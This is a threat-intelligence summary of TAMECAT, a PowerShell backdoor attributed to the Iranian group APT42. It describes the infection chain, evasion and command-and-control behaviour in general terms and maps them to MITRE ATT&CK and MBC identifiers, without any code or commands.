EXECUTIVE SUMMARY
TAMECAT is a PowerShell-based malware used by APT42, an Iranian state-sponsored cyber-espionage actor, built to support stealthy command execution and data collection during espionage operations. Reporting highlights its modular architecture, which allows APT42 operators to expand or modify functionality depending on the target environment. The malware has been observed in campaigns focused on high-value defense and government officials, where access is gained through prolonged social engineering rather than rapid exploitation. This approach helps establish trust and lowers suspicion before malware delivery. TAMECAT supports capabilities such as browser data extraction, screen capture, and system profiling, while relying heavily on in-memory execution to limit forensic artifacts. Commands and additional payloads are delivered dynamically, allowing APT42 to maintain flexibility and control throughout the intrusion lifecycle.
The infection chain begins with a lightweight VBScript that profiles the host by enumerating installed antivirus products. Based on the results, it selects an execution method to download and launch a PowerShell-based loader. This loader uses obfuscation, encoded configuration values, and encrypted payloads that are decrypted only at runtime. Additional stages are retrieved from remote locations using encoded URLs and browser-like user-agent strings. Retrieved content undergoes multiple transformations, including bitwise operations and AES decryption, before execution. The malware generates a unique victim identifier, collects system metadata, and encrypts the data prior to exfiltration.
Communication with the command server occurs over HTTP POST requests, and responses are decoded into structured fields that control execution flow, enabling dynamic tasking and payload management. TAMECAT demonstrates a mature and evolving malware design that emphasizes flexibility, stealth, and persistence. Repeated design patterns across variants suggest active development and reuse in multiple espionage campaigns. Heavy reliance on PowerShell, in-memory execution, and layered obfuscation complicates detection and analysis efforts. Encrypted command-and-control communications further protect operational intent and reduce visibility. Combined with patient social engineering tactics, TAMECAT enables sustained access to targeted environments rather than immediate impact. This blend of technical sophistication and human-driven intrusion highlights how modern espionage tooling prioritizes long-term intelligence collection while minimizing exposure.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Execution | T1204.002 | User Execution | Malicious File |
| Execution | T1047 | Windows Management Instrumentation | – |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | – |
| Defense Evasion | T1027.013 | Obfuscated Files or Information | Encrypted or Encoded Data |
| Discovery | T1518.001 | Software Discovery | Security Software Discovery |
| Discovery | T1082 | System Information Discovery | – |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1132.001 | Data Encoding | Standard Encoding |
| Command and Control | T1105 | Ingress Tool Transfer | – |
| Command and Control | T1573.001 | Encrypted Channel | Symmetric Cryptography |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | – |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
|---|---|---|
| Discovery | B0013 | Analysis Tool Discovery |
| Execution | E1059 | Command and Scripting Interpreter |
| Command and Control | B0030 | C2 Communication |
| Defense Evasion | E1027 | Obfuscated Files or Information |
| Collection | E1082 | System Information Discovery |
REFERENCES:
The following reports contain further
https://cybersecuritynews.com/tamecat-powershell-based-backdoor-exfiltrates-login-credentials/
https://blog.pulsedive.com/tamecat-analysis-of-an-iranian-powershell-based-backdoor/